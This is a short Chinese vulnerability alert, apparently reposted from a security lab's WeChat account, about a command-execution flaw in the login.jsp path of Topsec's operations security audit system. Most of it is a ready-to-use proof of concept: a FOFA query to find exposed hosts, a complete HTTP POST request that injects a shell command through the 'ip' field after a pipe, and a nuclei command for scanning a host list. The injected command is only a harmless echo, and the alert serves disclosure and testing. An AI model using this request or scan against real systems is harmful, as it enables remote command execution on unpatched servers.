0x02 漏洞描述
天融信运维安全审计系统 login.jsp存在命令执行漏洞(官方已修复)。
0x03 漏洞复现
fofa:header="iam" && server="Apache-Coyote/"
1.执行poc进行echo无害操作,得到结果
POST /iam/synRequest.do;.login.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
method=trace_route&w=1&ip=127.0.0.1|echo%20B2a670e17079fD8d%3b&m=10
2.nuclei验证脚本已发布于知识星球
nuclei.exe -t topsec-topsag-login-rce.yaml -l subs.txt -stat
原文始发于微信公众号(融云攻防实验室):漏洞预警 天融信运维安全审计系统 login.jsp存在命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论